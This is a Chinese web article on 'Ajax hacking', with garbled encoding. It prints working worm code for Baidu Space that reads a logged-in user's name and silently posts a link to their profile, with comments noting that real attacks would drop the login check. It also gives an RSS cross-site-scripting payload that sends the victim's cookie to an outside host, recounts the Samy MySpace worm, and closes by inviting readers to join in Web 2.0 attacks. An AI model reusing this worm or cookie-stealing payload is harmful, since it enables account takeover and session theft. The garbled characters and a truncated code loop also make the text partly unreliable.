Ajax Hacking
var req = null;
if(window.XMLHttpRequest) req = new XMLHttpRequest(); //- - 這句懂a(chǎn)jax的都知道,是它的核心XMLHttpRequest,而下面當(dāng)然是必不可少的判斷是否IE的語句了。
else if(window.ActiveXObject){
var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP');
for(var i=0;i try{req.overrideMimeType('text/xml')}catch(e){}
}
req.open('get','.',false);
req.send();
var s=req.responseText;
p=s.indexOf('passport.baidu.com/?logout');
if(p>0)
{
p=s.indexOf('');
if(p>0)
{
p=s.indexOf('/',p);
p2=s.indexOf(String.fromCharCode(34),p);
var user=s.substring(p+1,p2);
var name='Here is a bad site';
var link='目標(biāo)網(wǎng)址';
var desc='This link was added by an XSS script';
var url='/'+user+'/commit';
var data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc); //- - 這句是整個(gè)蠕蟲的執(zhí)行語句,也是Ajax的數(shù)據(jù)異步調(diào)用語句。
req.open('post',url,false);
req.send(data);
alert('A friend link has been added to your space at http://hi.baidu.com/' +user);
}
}
else{alert('You are not a logged Baidu user.');} //- - 由于是標(biāo)本語句,所以這里有對(duì)是否登陸的判斷,但實(shí)際攻擊中當(dāng)然不會(huì)有。
}");
}
#header {……
很簡(jiǎn)單的一句吧,這幾乎把該蠕蟲提升到了病毒性質(zhì),因?yàn)橛脩舯旧頍o法到達(dá)css修改頁(yè)面來修復(fù)他的css代碼。事實(shí)上直到寫這篇文章時(shí),百度空間尚沒有對(duì)一些另類的插入惡意代碼方式進(jìn)行有效地過濾和封鎖。
如果認(rèn)為他們所造成的影響都是局域的,那么我不得不帶領(lǐng)大家來看一些影響比較廣泛的最具有web2.0性質(zhì)的——Rss(Really Simple Syndication)攻擊。這是我從zdnet.com的Joris Evers的一篇名為“Blog feeds may carry security risk ”了解到的,大體意思是說由于目前幾乎所有的不管是在線的還是離線的Rss閱讀器都沒有有效地對(duì)攙雜在Rss中的腳本進(jìn)行過濾,導(dǎo)致攻擊者可以向Rss中寫入惡意的javascript代碼,最終導(dǎo)致xss跨站,獲取用戶信息或其他。包括著名的Bloglines, RSS Reader, RSS Owl, Feed Demon, Sharp Reader都在攻擊范圍之內(nèi)。這是去年yahoo rss xss代碼:
javascript:%20document.location='http://www.target.com/cookie.cgi?'%20+document cookie;
Should Steal Your Cookie.
Tue, 20 Sep 2005 23:55:18 EDT
javascript:%20alert(document.cookie);
Should Steal Your Cookie.
Tue, 20 Sep 2005 23:55:18 EDT
事實(shí)上,最早的web2.0攻擊出現(xiàn)在去年的myspace.上,有人在MySpace交友網(wǎng)站上寫了一段JavaScript蠕蟲代碼,利用Ajax方法讓無數(shù)的用戶在不知情的情況下把他加入了好友名單,同時(shí)在他們的個(gè)人簡(jiǎn)介最后自動(dòng)加上了“samy is my hero”的字樣。此蠕蟲被稱為世界上第一個(gè)“web2.0蠕蟲”。而從上文的對(duì)email、css、rss攻擊進(jìn)行的描述中你也可以看出目前對(duì) web2.0的攻擊利用亦是多方面的。但并不單單指跨站,網(wǎng)上有一篇《Hacking Ajax》的文章,其中有一句話被加了黑體,“By corrupting one of the dozens of data exchanges Ajax handles while loading a Web page, a hacker can take over control of the PC”,也就是說適當(dāng)情況下,利用Ajax攻擊并獲得個(gè)人電腦管理權(quán)限亦是可能的。
由于目前系統(tǒng)對(duì)補(bǔ)丁的發(fā)布采取的都是時(shí)時(shí)更新功能,想通過溢出獲得shell已經(jīng)很難了,除非是0day的系統(tǒng)漏洞;而sql注入在網(wǎng)絡(luò)也肆虐了幾年,亦有了行之有效的防范方法;并且由于Python和Ruby語言的興起,新的web2.0服務(wù)正在產(chǎn)生并有取代現(xiàn)有web結(jié)構(gòu)趨勢(shì),譬如Plone。但不可改變的是web瀏覽器對(duì)xhtml和javascript的解釋,只要我們始終有改變javascript的可能性,我們就永遠(yuǎn)有提升自己權(quán)限的可能……
那么對(duì)于日趨龐大的web2.0大軍,你是否有興趣從中分一杯羹呢?
相關(guān)文章
asp.net+Ajax 文本文件靜態(tài)分頁(yè)實(shí)現(xiàn)代碼
代碼還是很淺顯易懂的,呵呵因?yàn)槲乙膊粫?huì)寫高深的代碼。重要的我們都要?jiǎng)邮秩?shí)踐。菜鳥們多多努力哦。做完我這個(gè)例子級(jí)會(huì)收獲很多哦。2010-05-05ajax無刷新分頁(yè)的簡(jiǎn)單實(shí)現(xiàn)
這篇文章主要為大家詳細(xì)介紹了ajax無刷新分頁(yè)的簡(jiǎn)單實(shí)現(xiàn)代碼,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2016-05-05基于Ajax技術(shù)實(shí)現(xiàn)無刷新用戶登錄功能
這篇文章主要介紹了基于Ajax技術(shù)實(shí)現(xiàn)無刷新用戶登錄功能,非常不錯(cuò),具有參考借鑒價(jià)值,需要的的朋友參考下吧2017-01-01通過Ajax請(qǐng)求動(dòng)態(tài)填充頁(yè)面數(shù)據(jù)的實(shí)例
今天小編就為大家分享一篇通過Ajax請(qǐng)求動(dòng)態(tài)填充頁(yè)面數(shù)據(jù)的實(shí)例,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過來看看吧2018-08-08菜鳥蔡之Ajax復(fù)習(xí)第一篇(后臺(tái)asp.net)(傳統(tǒng)的JavaScript方法實(shí)現(xiàn)Ajax功能)
Ajax是Asynchronous JavaScript and XML,其核心是通過XMLHttpRequest對(duì)象以一種異步的方式向服務(wù)器發(fā)送請(qǐng)求,并通過該對(duì)象接收請(qǐng)求返回的數(shù)據(jù),從而完成人機(jī)交互的數(shù)據(jù)操作(呵呵、、、說的有點(diǎn)嚇人!)2012-11-11Ajax如何進(jìn)行跨域請(qǐng)求?Ajax跨域請(qǐng)求的原理
Ajax如何進(jìn)行跨域請(qǐng)求?這篇文章主要為大家詳細(xì)介紹了Ajax跨域請(qǐng)求的原理,Ajax怎么樣做跨域請(qǐng)求?具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2017-08-08使用ajax技術(shù)無刷新動(dòng)態(tài)調(diào)用新浪股票實(shí)時(shí)數(shù)據(jù)
由于最近網(wǎng)速慢的緣故,查看股票信息時(shí)網(wǎng)頁(yè)老是打不開。這幾天一直在研究ajax,于是用jquery自己做了一個(gè)自動(dòng)讀取新浪股票實(shí)時(shí)數(shù)據(jù)的頁(yè)面2014-08-08